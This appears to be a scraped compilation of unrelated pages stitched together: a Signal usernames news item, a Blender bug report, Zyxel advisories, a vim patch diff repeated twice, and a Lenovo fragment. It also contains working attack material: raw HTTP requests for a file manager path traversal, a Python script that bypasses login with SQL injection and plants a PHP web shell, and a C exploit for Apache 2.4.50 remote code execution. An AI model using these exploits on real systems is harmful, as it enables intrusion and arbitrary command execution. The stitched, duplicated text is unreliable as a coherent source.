The Signal messaging service is testing support for usernames as a replacement for phone numbers to serve as user identities

Messaging service Signal is testing support for usernames as a replacement for phone numbers to serve as user identities.

Signal provides encrypted instant messaging and is popular among people that value their privacy. Compared to more popular services like WhatsApp, Signal offers more layers of privacy protection, customization of settings, and enhanced data security. These layers include hiding metadata, not using a user’s data, allowing call relay, and others.

The current Signal setup requires users to sign up with a phone number and this number will be shared if you want to message other users on the app. But not everyone wants to share their phone number when messaging someone and so Signal is doing something about that.

 On its forums, Signal announced the feature is ready for pre-beta-testing.

> “After rounds of internal testing, we have hit the point where we think the community that powers these forums can help us test even further before public launch.”

So, for now, the announced feature is currently only available for the app’s testers on Android, iOS, and desktop users. Once it’s finally released, you’ll be able to select your username by going to Settings > Profile and Settings > Privacy > Phone Number section.

From a screenshot posted on X, it looks like you’ll be able to invite new contacts by sending them a link or a QR code.

_Screenshot of new options_

It’s also likely you still have to have a phone number to create an account. The new feature just allows you to hide your number behind a username. Phone numbers will still be used as a unique identification and as an anti-spam measure.

We don’t know when the new feature will be generally available, but in an earlier interview, president Meredith Whitaker said she expected the feature’s launch in early 2024. However, this seems unlikely as it requires a major overhaul of the app’s architecture.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 Signal is testing usernames so you don’t have to share your phone number 

When rendering with headless builds, show an error instead of crashing. Previously GPU_backend_init was called indirectly from DRW_opengl_context_create, a new function is now called from the window manager (GPU_backend_init_once), so it's possible to check if the GPU has a back-end. This also disables the bgl Python module when building WITH_HEADLESS.

**System Information**  
Operating system: Ubuntu 20.04.4 LTS  
Graphics card: 2b:00.0 VGA compatible controller: NVIDIA Corporation TU116 \[GeForce GTX 1650 SUPER\] (rev a1)

**Blender Version**  
Broken: Blender 3.3.0 Alpha branch : master, commit 3b15467e97abf473d4d25c7382999115d3169a57 Date: Thu Jul 14 16:33:21 2022 +0200

Worked: -

**Short description of error**  
when use blender-headless that include blender  
return Null ptr in option -a added

**Exact steps for others to reproduce the error**

1.  build blender using

2.  ./blender -b \[blend file path\] -s 1 -e 25 -a ./blender -b \[blend file path\] -a

both can reproduce null ptr reference. I think its caused by "a" options

**POC video below**  
https://youtu.be/\_ys1VEdZ3Co

**POC blend file below**  
the blend file is regulare and produced by blender(UI) that just basic square that app basically served

both is same  
https://drive.google.com/file/d/1VLDLbVASAhKm8\_x8UoX-ljIspAwmaBLm/view?usp=sharing

**Note**  
Maybe this bug occured in

source/blender/gpu/opengl/gl\_backend.cc\`\`\` that include void GPBackend::platform\_init()

CVE-2022-2832: ⚓ T99706 Null pointer Reference in blender_headless

The post-authentication command injection vulnerability in the Zyxel NAS326 firmware versions prior to V5.21(AAZF.13)C0 could allow an authenticated attacker with administrator privileges to execute some operating system (OS) commands on an affected device remotely.

**CVE: CVE-2023-27988****Summary**

Zyxel has released patches addressing a post-authentication command injection vulnerability in some NAS versions. Users are advised to install them for optimal protection.

**What is the vulnerability?**

The post-authentication command injection vulnerability has been found in the web management interface of some NAS versions. An authenticated attacker with administrator privileges could leverage this vulnerability to execute some operating system (OS) commands on an affected device remotely.

**What versions are vulnerable—and what should you do?**

After a thorough investigation, we have identified the vulnerable products that are within their vulnerability support period, with their firmware patches shown in the table below.

  
**Got a question?**

Please contact your local service rep or visit Zyxel’s Community for further information or assistance.

**Acknowledgment**

Thanks to Noam Zhitomirsky, Reuven Yakar, Dean Zavadski, and Amit Serper from Sternum and Sternum LIV for reporting the issue to us.

**Revision history**

2023-5-30: Initial release.

**Have a question?**

We are always here to help!

Contact us

CVE-2023-27988: Zyxel security advisory for post-authentication command injection vulnerability in NAS products | Zyxel Networks

The privilege escalation vulnerability in the Zyxel GS1900-8 firmware version 

V2.70(AAHH.3) and the GS1900-8HP firmware version V2.70(AAHI.3) could allow an authenticated, local attacker with administrator privileges to execute some system commands as 'root' on a vulnerable device via SSH.

**CVE: CVE-2022-45853****Summary**

Zyxel has released patches for GS1900 series switches affected by a privilege escalation vulnerability. Users are advised to install them for optimal protection.

**What is the vulnerability?**

The privilege escalation vulnerability in the Zyxel GS1900 series switches could allow a local authenticated attacker with administrator privileges to execute some system commands as the “root” user on a vulnerable device via SSH. Although SSH access is disabled by default, which would make a network immune from the attack, users are still recommended to upgrade to the latest firmware for optimal protection.

**What versions are vulnerable—and what should you do?**

After a thorough investigation, we’ve identified the vulnerable switches that are within their vulnerability support period and released patches to address the vulnerability, as shown in the table below.

  
**Got a question?**

Please contact your local service rep or visit Zyxel’s Community for further information or assistance.

**Acknowledgment**

Thanks to Justin Aarden for reporting the issue to us.

**Revision history**

2023-6-6: Initial release.

**Have a question?**

We are always here to help!

Contact us

CVE-2022-45853: Zyxel security advisory for privilege escalation vulnerability in GS1900 series switches | Zyxel Networks

A vulnerability was found in Tecrail Responsive Filemanger up to 9.10.x and classified as critical. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 9.11.0 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion**

_From_: Wiswat A <wiswat.a () gmail com>  
_Date_: Wed, 8 Feb 2017 00:28:23 +0700  

\[+\] Exploit Title: Responsive Filemanger <= 9.11.0 - Arbitrary File
Disclosure/Deletion
\[+\] Date: 7 Feb 2017
\[+\] Vulnerability and Exploit Author: Wiswat Aswamenakul
\[+\] Vendor Homepage: http://www.responsivefilemanager.com/
\[+\] Affected version: only tested on 9.11.0 and 9.7.3 (other versions
might be affected)
\[+\] Tested on: Ubuntu 14.04, PHP 5.5.9
\[+\] Category: webapps

\[+\] Description
Responsive filemanger is a PHP based file manager that make use of AJAX
technology. It has various useful features. One of them is copy/cut and
paste files. However, the copy/cut feature does not santize file name
that will be copied/cut. Therefore, it is possible for attackers to
copied/cut any files including PHP files and paste them to overwrite
existing image files. Then, the attackers could download the overwritten
image files to read the content of the copied/cut files. Moreover, for
the cut feature, it can cause the original files to be deleted as well.

\[+\] Exploit
1. Upload a normal image file (jpg, png, gif) to a server
2. Right click at any files, select copy and capture the request with
Burp Suite (or any local proxy)
3. Change parameter "path" to any file name that we would like to
download, for example, path=../filemanager/config/config.php

###
POST /fm/filemanager/ajax\_calls.php?action=copy\_cut HTTP/1.1
Host: 192.168.1.128
Content-Length: 53
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=%2F&5869110e2a073
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=../filemanager/config/config.php&sub\_action=copy
###

4. Go to any sub directory, right click at any files, intercept the
request with burp, select "Paste to this directory"
5. Change parameter "path" to the image file uploaded in step 1, for
example, path=subdir/size.png

###
POST /fm/filemanager/execute.php?action=paste\_clipboard HTTP/1.1
Host: 192.168.1.128
Content-Length: 20
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=subdir%2F&5869110f9a268
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=subdir/size.png
###

6. Download the image file uploaded in step 1, it will contain content
of the file specified in step 3

\[+\] Note (about another issue I found)
During this report, I found another separated issue with the attack
filtering that only check for "../" but not "..\\" which can be used to
bypass all filters if the application runs on Windows server and reported
the issue to the owner as well. However, I found out that this issue was
found by a guy from hacktizen and detailed in following blog post
http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
So, the credit goes for the guy who firstly reported. Perhaps, the guy from
hackitizen did not contact the owner of responsive filemanger or there are
any problems with communication. Therefore, the issue remains unresolved.

\[+\] Timeline
- 02/01/2017: Contact Owner
- 05/02/2017: Patched version is available
- 07/02/2017: Public Advisory

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion** _Wiswat A (Feb 07)_

CVE-2017-20145: Full Disclosure: Responsive Filemanger <= 9.11.0

Cross-Site Request Forgery (CSRF) vulnerability in WordPlus Better Messages plugin <= 1.9.9.148 at WordPress allows attackers to upload files. File attachment to messages must be activated.

CVE-2022-29454: Better Messages – Live Chat for WordPress, BuddyPress, BuddyBoss, Ultimate Member, PeepSo

Permalink

Browse files

patch 8.2.4009: reading one byte beyond the end of the line

Problem:    Reading one byte beyond the end of the line.
Solution:   Check for NUL byte first.

*   Loading branch information

![@brammool](https://avatars.githubusercontent.com/u/8530623?s=40&v=4)

1 parent 677658a commit d3a117814d6acbf0dca3eff1a7626843b9b3734a

Showing with **17 additions** and **2 deletions**.

1.  +2 −1 src/ex\_docmd.c
2.  +11 −0 src/testdir/test\_vim9\_func.vim
3.  +2 −0 src/version.c
4.  +2 −1 src/vim9compile.c

@@ -3632,7 +3632,8 @@ find\_ex\_command(

}

  

// Check for "++nr" and "--nr".

if (p == eap->cmd && p\[0\] == p\[1\] && (\*p == '+' || \*p == '\-'))

if (p == eap->cmd && p\[0\] != NUL && p\[0\] == p\[1\]

&& (\*p == '+' || \*p == '\-'))

{

eap->cmdidx = \*p == '+' ? CMD\_increment : CMD\_decrement;

return eap->cmd + 2;

@@ -3537,6 +3537,17 @@ def Test\_numbered\_function\_reference()

unlet g:mydict

enddef

  

def Test\_go\_beyond\_end\_of\_cmd()

\# this was reading the byte after the end of the line

var lines \=<< trim END

def F()

cal

enddef

defcompile

END

CheckScriptFailure(lines, 'E476:')

enddef

  

if has('python3')

def Test\_python3\_heredoc()

py3 << trim EOF

@@ -750,6 +750,8 @@ static char \*(features\[\]) =

  

static int included\_patches\[\] =

{ /\* Add new patch number below this line \*/

/\*\*/

4009,

/\*\*/

4008,

/\*\*/

@@ -2781,7 +2781,8 @@ compile\_def\_function(

cmd = ea.cmd;

if ((\*cmd != '$' || starts\_with\_colon)

&& (starts\_with\_colon || !(\*cmd == '\\''

|| (cmd\[0\] == cmd\[1\] && (\*cmd == '+' || \*cmd == '\-')))))

|| (cmd\[0\] != NUL && cmd\[0\] == cmd\[1\]

&& (\*cmd == '+' || \*cmd == '\-')))))

{

ea.cmd = skip\_range(ea.cmd, TRUE, NULL);

if (ea.cmd > cmd)

**0 comments on commit `d3a1178`**

Please sign in to comment.

CVE-2022-0128: patch 8.2.4009: reading one byte beyond the end of the line · vim/vim@d3a1178

Online Diagnostic Lab Management System version 1.0 remote exploit that bypasses login with SQL injection and then uploads a shell.

    # Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)# Google Dork: N/A# Date: 2022-9-23# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# Authentication Required: bypass login with sql injection #/usr/bin/python3 import requests import osimport sysimport timeimport random# clean screenos.system("cls")os.system("clear")logo = '''###################################################################                                                                #  #    Exploit Script ( Online Diagnostic Lab Management System )  ##                                                                ###################################################################'''print(logo)url = str(input("Enter website url : "))username = ("' OR 1=1-- -")password = ("test")req = requests.Session()target = url+"/diagnostic/login.php"data = {'username':username,'password':password}website = req.post(target,data=data)files = open("rev.php","w")payload = "<?php system($_GET['cmd']);?>"files.write(payload)files.close()hash = random.getrandbits(128)name_file = str(hash)+".php"if "Login Successfully" in website.text:        print("[+] Login Successfully")    website_1 = url+"/diagnostic/php_action/createOrder.php"    upload_file = {         "orderDate": (None,""),        "clientName": (None,""),        "clientContact" : (None,""),        "productName[]" : (None,""),        "rateValue[]" : (None,""),        "quantity[]" : (None,""),        "totalValue[]" : (None,""),        "subTotalValue" : (None,""),        "totalAmountValue" : (None,""),        "discount" : (None,""),        "grandTotalValue" : (None,""),        "gstn" : (None,""),        "vatValue" : (None,""),        "paid" : (None,""),        "dueValue" : (None,""),        "paymentType" : (None,""),        "paymentStatus" : (None,""),        "paymentPlace" : (None,""),        "productImage" : (name_file,open("rev.php","rb"))        }     up = req.post(website_1,files=upload_file)    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")else:     print("[-] Check username or password")

Online Diagnostic Lab Management System 1.0 SQL Injection / Shell Upload

Apache version 2.4.50 remote code execution exploit that leverages a traversal as identified in CVE-2021-42013. Written in C.

    #include <stdio.h>#include <stdlib.h>#include <stdbool.h>#include <string.h>#include <curl/curl.h>/* Apache 2.4.50 exploit (CVE-2021-42013) * Author: Vilius Povilaika * Website: www.povilaika.com */// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013int usage(char* prog){  printf("Usage: %s <host> <exec>\n", prog);  printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog);  return 0;}bool error(const char* reason){  printf("[ERR] Critical error - %s\n", reason);  return false;}struct callback_result {  char* data;  size_t size;};static size_t callback(void* pointer, size_t size, size_t nmemb, void* data){  struct callback_result *memory = (struct callback_result *)data;  char* ptr = realloc(memory->data, memory->size+nmemb+1);  memory->data = ptr;  memcpy(&(memory->data[memory->size]), pointer, nmemb);  memory->size += nmemb;  memory->data[memory->size] = 0;  return nmemb;}bool exploit(void* result, char* host, char* exec){  CURL *curl = curl_easy_init();  char url[256];  sprintf(url, "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh", host);  curl_easy_setopt(curl, CURLOPT_URL, url);  char payload[256];  sprintf(payload, "echo Content-Type: text/plain; echo; %s", exec);  curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);  curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);  curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);  int res = curl_easy_perform(curl);  if (res != CURLE_OK)    return error(curl_easy_strerror(res));  curl_easy_cleanup(curl);  return true;}int main(int argc, char* argv[]){  if (argc != 3)    return usage(argv[0]);  struct callback_result result = {0};  bool res = exploit(&result, argv[1], argv[2]);  if (res)    printf("[+] Exploit finished successfully, check output\n");  else    printf("[-] Exploit failed, check output\n");  printf(" \n%s\n", result.data);  return 0;}

Apache 2.4.50 Remote Code Execution

Permalink

Browse files

patch 8.2.4009: reading one byte beyond the end of the line

Problem:    Reading one byte beyond the end of the line.
Solution:   Check for NUL byte first.

*   Loading branch information

1 parent 677658a commit d3a117814d6acbf0dca3eff1a7626843b9b3734a

Showing with **17 additions** and **2 deletions**.

1.  +2 −1 src/ex\_docmd.c
2.  +11 −0 src/testdir/test\_vim9\_func.vim
3.  +2 −0 src/version.c
4.  +2 −1 src/vim9compile.c

@@ -3632,7 +3632,8 @@ find\_ex\_command(

}

  

// Check for "++nr" and "--nr".

if (p == eap->cmd && p\[0\] == p\[1\] && (\*p == '+' || \*p == '\-'))

if (p == eap->cmd && p\[0\] != NUL && p\[0\] == p\[1\]

&& (\*p == '+' || \*p == '\-'))

{

eap->cmdidx = \*p == '+' ? CMD\_increment : CMD\_decrement;

return eap->cmd + 2;

@@ -3537,6 +3537,17 @@ def Test\_numbered\_function\_reference()

unlet g:mydict

enddef

  

def Test\_go\_beyond\_end\_of\_cmd()

\# this was reading the byte after the end of the line

var lines \=<< trim END

def F()

cal

enddef

defcompile

END

CheckScriptFailure(lines, 'E476:')

enddef

  

if has('python3')

def Test\_python3\_heredoc()

py3 << trim EOF

@@ -750,6 +750,8 @@ static char \*(features\[\]) =

  

static int included\_patches\[\] =

{ /\* Add new patch number below this line \*/

/\*\*/

4009,

/\*\*/

4008,

/\*\*/

@@ -2781,7 +2781,8 @@ compile\_def\_function(

cmd = ea.cmd;

if ((\*cmd != '$' || starts\_with\_colon)

&& (starts\_with\_colon || !(\*cmd == '\\''

|| (cmd\[0\] == cmd\[1\] && (\*cmd == '+' || \*cmd == '\-')))))

|| (cmd\[0\] != NUL && cmd\[0\] == cmd\[1\]

&& (\*cmd == '+' || \*cmd == '\-')))))

{

ea.cmd = skip\_range(ea.cmd, TRUE, NULL);

if (ea.cmd > cmd)

**0 comments on commit d3a1178**

Please sign in to comment.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us